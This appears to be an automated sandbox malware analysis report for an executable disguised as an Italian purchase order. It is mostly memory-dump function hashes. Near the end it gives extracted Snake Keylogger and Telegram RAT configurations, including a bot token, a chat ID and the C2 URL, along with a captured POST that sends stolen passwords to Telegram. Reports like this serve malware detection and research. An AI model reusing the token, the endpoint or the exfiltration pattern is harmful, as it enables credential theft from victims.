Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0118e6bb2105610f212ae73d62c5dd32b99abe4abfe387426244c5d933adbe5
Instruction ID: 09ed28909786ab9b1322a5197770520d5902a2b9134f4dfc757c5f3056bb4225
Opcode Fuzzy Hash: c0118e6bb2105610f212ae73d62c5dd32b99abe4abfe387426244c5d933adbe5
Instruction Fuzzy Hash: 03C1C374E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F57060 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f53e7ec4ce806e644089fc3e2b2d3c9930d36bf1e8fb7ed33e65bbd2313f59
Instruction ID: 7b2476eea9989d6e98c57acc6b4e43b5bac009d636d9cf941551c57b3f438d29
Opcode Fuzzy Hash: 51f53e7ec4ce806e644089fc3e2b2d3c9930d36bf1e8fb7ed33e65bbd2313f59
Instruction Fuzzy Hash: 1DC1A074E01218CFDB14DFA5D994B9DBBB2FF89304F2081A9D809AB359DB395A81CF50

Function 05F54C40 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9303776f991a9d42d28c24abf1e46b71db877626eca64dec4be82ef883285b1
Instruction ID: 50ce5ec119a4b5621476ad588b951e67a00b39c80adfac01e9b07c4494027d9d
Opcode Fuzzy Hash: b9303776f991a9d42d28c24abf1e46b71db877626eca64dec4be82ef883285b1
Instruction Fuzzy Hash: 9EC1C374E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F50040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6343660223eeae92ee283b88038ca78d89b4ba7f8d057f780bd1dabb750d0d26
Instruction ID: c3a47a0e28d208335802e730fc0011eb7daed8cd1e7127370d2735592f2d0727
Opcode Fuzzy Hash: 6343660223eeae92ee283b88038ca78d89b4ba7f8d057f780bd1dabb750d0d26
Instruction Fuzzy Hash: 24C1C374E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F56C08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96840b66005924c8968c12d044384fba3f075db98cdfd98ec72f80a61ac3a055
Instruction ID: a6bc7b03c2d106fac82026768fb6133b3a6cfd9687164262f87b062e27b90683
Opcode Fuzzy Hash: 96840b66005924c8968c12d044384fba3f075db98cdfd98ec72f80a61ac3a055
Instruction Fuzzy Hash: 3AC1E474E01218CFDB14DFA5D894B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F547E8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0d6f905720818bbba1b1056e9e150ac771add1f620bb24a26e194b770a2617
Instruction ID: 2147189adb254f72f965461207af33e921f5be27106042ec16c7b42dcc6f6db8
Opcode Fuzzy Hash: 6e0d6f905720818bbba1b1056e9e150ac771add1f620bb24a26e194b770a2617
Instruction Fuzzy Hash: 91C1B374E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F567B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33768c1d489d4dc3b5f74229570e81e2a7e3abab84f3ab83c0896e1d79184fb6
Instruction ID: 3feef44ddc8f7c90bcfaba3ef88fba715534add1d4b540835d8dc7b906c32a79
Opcode Fuzzy Hash: 33768c1d489d4dc3b5f74229570e81e2a7e3abab84f3ab83c0896e1d79184fb6
Instruction Fuzzy Hash: 66C1D474E01218CFDB14DFA5D894B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F54368 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f1402ba1363d0852c12be40df4934ea2f63ff2c8bca85f5569d51c8a9e38c7
Instruction ID: 91d2e1c3da13d140730a60ac0d70f539ece04c7a7d063197539e1537798d7d20
Opcode Fuzzy Hash: 57f1402ba1363d0852c12be40df4934ea2f63ff2c8bca85f5569d51c8a9e38c7
Instruction Fuzzy Hash: 0FC1C274E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F56220 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0bd33be67cfb2ae8bdb40b13f10c86d3cae9fbbacfb46377f9728ddf3001e1
Instruction ID: 8f3e01a3ff2ba763b1ecd5a6a446b3516ad71d8aeaa2b09a1cecc567815c82fc
Opcode Fuzzy Hash: 0e0bd33be67cfb2ae8bdb40b13f10c86d3cae9fbbacfb46377f9728ddf3001e1
Instruction Fuzzy Hash: 25C1D474E00218CFDB14DFA5D894B9DBBB2BF89304F2081A9D809AB359DB395E85CF50

Function 05F2C1F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db4aa01986aaaf6c4a612089713273e58128b08dabbd046e15be8db66676e34
Instruction ID: a710c946b4b68067321ecb7430f924c2542c66e148b203de2dec7630d52a1cba
Opcode Fuzzy Hash: 9db4aa01986aaaf6c4a612089713273e58128b08dabbd046e15be8db66676e34
Instruction Fuzzy Hash: AAC1C474E01218CFDB14DFA5D954B9DBBB2BF89304F2081A9D409AB359DB399E81CF50

Function 05F2F1B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93423575114a1f26eb4861b7057dc9098a9d693630b3c21ab1d9f9312c13fcf
Instruction ID: 4c0dd0f9749a8a6332b1884e4dcd58fd04ab9cdc4cae4a187b0c22dc4f44b663
Opcode Fuzzy Hash: f93423575114a1f26eb4861b7057dc9098a9d693630b3c21ab1d9f9312c13fcf
Instruction Fuzzy Hash: 32C1D474E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2BD98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552438dd57da66ce743791e3a95f51470f0eba89079bf3e5a04b345926ddaef4
Instruction ID: c0fadec4008f1c2fd5df696c22647e03dcaaea0b22cddd39a30493eb1e0cbf3f
Opcode Fuzzy Hash: 552438dd57da66ce743791e3a95f51470f0eba89079bf3e5a04b345926ddaef4
Instruction Fuzzy Hash: D9C1B474E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F20D60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ada8b2035dbe7065b0c825e5c2635d0f6959fe34601cdc8c2501921ac27a5a7
Instruction ID: 0505d40055f1700963a29abd1d8ab3de1799cc397bb7ec13ffdac42c6b40ee50
Opcode Fuzzy Hash: 3ada8b2035dbe7065b0c825e5c2635d0f6959fe34601cdc8c2501921ac27a5a7
Instruction Fuzzy Hash: 17C1A174E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809A7365DB359E81CF50

Function 05F2ED60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea3367c5e14277c9622c0e9c3ccaf20ef27e2cacdba0e2a9390ab1fe68998ec
Instruction ID: fd1dd223b6e1c7ab214d51d00ea90305ef76e2dae33d1e203fca3e5bcd2ae435
Opcode Fuzzy Hash: 5ea3367c5e14277c9622c0e9c3ccaf20ef27e2cacdba0e2a9390ab1fe68998ec
Instruction Fuzzy Hash: CFC1C374E01218CFDB14DFA5D994BADBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2B940 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff13a16b4b0635a9552a984fa9e5e7e9ac8357044381d04f32f8db041765b50
Instruction ID: 363ca927c93b189b2b344a39003b41c5101c7fd4431467687bf64c8b2f30fec9
Opcode Fuzzy Hash: 9ff13a16b4b0635a9552a984fa9e5e7e9ac8357044381d04f32f8db041765b50
Instruction Fuzzy Hash: EFC1B374E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F20900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92873f8c6c3af4a15be0942059bf2743394b5e3a79b63f850cb7afbdde95e2a5
Instruction ID: 00283b65d3b25b9637dc7c263b90aa2c4fc3965cf4843613c81b820dd962e934
Opcode Fuzzy Hash: 92873f8c6c3af4a15be0942059bf2743394b5e3a79b63f850cb7afbdde95e2a5
Instruction Fuzzy Hash: 87C1A174E01218CFEB14DFA5D998B9DBBB2BF89304F2081A9D809A7365DB355E81CF50

Function 05F2E908 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 278e53fbc05eaf0b499ab22d3d0323f6c3875af89c733f29689719147b2f6f6a
Instruction ID: 66ec99fc3c9a806719e0ec04f643ccf7ee51abe0b3ba38963b0b837eb04519fb
Opcode Fuzzy Hash: 278e53fbc05eaf0b499ab22d3d0323f6c3875af89c733f29689719147b2f6f6a
Instruction Fuzzy Hash: DEC1C474E01218CFDB14DFA5D994BADBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2B4E8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f85a28cf5b7e656d82fcd4a3d8d7281da4818d948b4a902f12e64c5932d877
Instruction ID: ab1c346f4edb2572a36ee5665421073ce1592bd5b22f2af7391ec3f9fa6ad200
Opcode Fuzzy Hash: 67f85a28cf5b7e656d82fcd4a3d8d7281da4818d948b4a902f12e64c5932d877
Instruction Fuzzy Hash: 08C1C474E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D809AB359DB395E81CF50

Function 05F2E4B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1c2444f080e9ff9a898869a9e6b76ed6e30db612d067a750159d44ea30b15d
Instruction ID: b9cc7099c400ae078a7b8249a58f954f0cd3ca66d130356d990d4a3c6633a5f0
Opcode Fuzzy Hash: 6e1c2444f080e9ff9a898869a9e6b76ed6e30db612d067a750159d44ea30b15d
Instruction Fuzzy Hash: D9C1B574E01218CFDB14DFA5D954BADBBB2BF89304F2081A9D409AB359DB355E81CF50

Function 05F204A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c6ff7cc206903aa3142bb63d6b989e8d4713f311e0ab96dfe0ecc5655adacf
Instruction ID: dad907d715f975f87fd46d718d533c573e185addd11547af3340f97e3d63b781
Opcode Fuzzy Hash: b6c6ff7cc206903aa3142bb63d6b989e8d4713f311e0ab96dfe0ecc5655adacf
Instruction Fuzzy Hash: 5DC1A174E01218CFDB14DFA5D998B9DBBB2BF89304F2081A9D809A7365DB355E81CF50

Function 05F2E058 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 409c221dc1c9be976eee356c3441940fcc17b4bc71a2b78fdd7c2bce572c2d54
Instruction ID: 8557be9990c731e2e481e9655abe7bf78a2e2aae6e89cb2119162366cc56fa15
Opcode Fuzzy Hash: 409c221dc1c9be976eee356c3441940fcc17b4bc71a2b78fdd7c2bce572c2d54
Instruction Fuzzy Hash: A5C1C474E01218CFDB14DFA5D994BADBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2DC00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ae45815162be3faf0b7cf0b2117285c2c9246cceca01eeb0b1b8584f6aaba7
Instruction ID: 7c7f195bb9135113eeab053f05ef21c4a0a57936d17794254f35fe17de005b1f
Opcode Fuzzy Hash: 12ae45815162be3faf0b7cf0b2117285c2c9246cceca01eeb0b1b8584f6aaba7
Instruction Fuzzy Hash: 8EC1A3B4E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2D7A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd34ebb09ae65636d288814a29bbe3aa512732910822cba14f3efb6b2707cb4
Instruction ID: 085f1b1b99aa54de6dee6d116de02d4252d6ff2fb20996472c1c177807cc702c
Opcode Fuzzy Hash: 3bd34ebb09ae65636d288814a29bbe3aa512732910822cba14f3efb6b2707cb4
Instruction Fuzzy Hash: DFC1B374E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2D350 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb0c9e2374410e340923308ad05ae6eb7097a1c90bd01e36d82c3ddb4bb44f8
Instruction ID: 7682214e0d95bb72956a6bc9042a12998fae3eb9e33f145756ed06d7da6efc2c
Opcode Fuzzy Hash: 0bb0c9e2374410e340923308ad05ae6eb7097a1c90bd01e36d82c3ddb4bb44f8
Instruction Fuzzy Hash: 34C1B3B4E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2CEF8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12170946e19bfd44f937ac45131fad055e1a13058f534f7b707743630ce094ff
Instruction ID: d509f187006f81767d3242b0b78c7227cf6e5bd4b9f48bc5a844a99133ff389c
Opcode Fuzzy Hash: 12170946e19bfd44f937ac45131fad055e1a13058f534f7b707743630ce094ff
Instruction Fuzzy Hash: 53C1A474E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB399E81CF50

Function 05F2CAA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd3c01a497db000950b6e1ccb4a72b4986fe8ea8c711d10390cce72eaed8f4f
Instruction ID: 39fc60bbe535f738d8e8c5c8718422162902a6a9220e9e51f4b8d4c7f29d0d1f
Opcode Fuzzy Hash: abd3c01a497db000950b6e1ccb4a72b4986fe8ea8c711d10390cce72eaed8f4f
Instruction Fuzzy Hash: 50C1B3B4E01218CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2FA68 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51a8038c98cb35630e3e0b559fae051b2bf9df91f4a3e134a5dfc9f772e0485c
Instruction ID: b962d161f9b36b3bc3f620e5f191a5ae9531039b931c5d1c7b0d2225ad5d30b3
Opcode Fuzzy Hash: 51a8038c98cb35630e3e0b559fae051b2bf9df91f4a3e134a5dfc9f772e0485c
Instruction Fuzzy Hash: B2C1C474E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2C648 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa8184f21a7b21f9d918d9b1fa69c794e1ffdd16544f84d3ba036a0c153876d
Instruction ID: 940ced5055a47780d01c0fb728f20b221e654757a8135d178dc09ae223b7321a
Opcode Fuzzy Hash: 2fa8184f21a7b21f9d918d9b1fa69c794e1ffdd16544f84d3ba036a0c153876d
Instruction Fuzzy Hash: A7C1C374E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F2F610 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4594792792.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f20000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9b4b2e26bb8e323e1b51dd31af78ff422106525b9d770c7b2d895e5c43b61e
Instruction ID: 26e5ef15939bc2547db1d03c338df4a39425633a5163da45e96112b4e1e02e12
Opcode Fuzzy Hash: de9b4b2e26bb8e323e1b51dd31af78ff422106525b9d770c7b2d895e5c43b61e
Instruction Fuzzy Hash: 53C1C374E01228CFDB14DFA5D994B9DBBB2BF89304F2081A9D409AB359DB395E81CF50

Function 05F5F032 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4595159200.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5f50000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e833a5553dfa5538f2d973f8f7519bf238a17319d813a726670aab1b53928ed9
Instruction ID: 5ddc73bdef515cf78f3b8b5e9af82e0a3672932301a96f360893a3ce69f4b04d
Opcode Fuzzy Hash: e833a5553dfa5538f2d973f8f7519bf238a17319d813a726670aab1b53928ed9
Instruction Fuzzy Hash: 8FD06C75D4412C8ACB20EFA8A8516ECB7B1EF87310F0064E6990CB7200D6309A50CF56

Source: 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}
Source: InstallUtil.exe.2676.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49962 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.6:49962 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36a1470e4a51Host: api.telegram.orgContent-Length: 572Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Virustotal: Detection: 51%			Perma Link
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	ReversingLabs: Detection: 63%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00B2F206h	3_2_00B2F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00B2FB90h	3_2_00B2F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_00B2E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F21471h	3_2_05F211C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F202F1h	3_2_05F20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F21A38h	3_2_05F21620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2C499h	3_2_05F2C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2F461h	3_2_05F2F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2C041h	3_2_05F2BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F21011h	3_2_05F20D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2F009h	3_2_05F2ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F21A38h	3_2_05F21966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2BBE9h	3_2_05F2B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F20BB1h	3_2_05F20900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2EBB1h	3_2_05F2E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2B791h	3_2_05F2B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05F2E759h	3_2_05F2E4B0
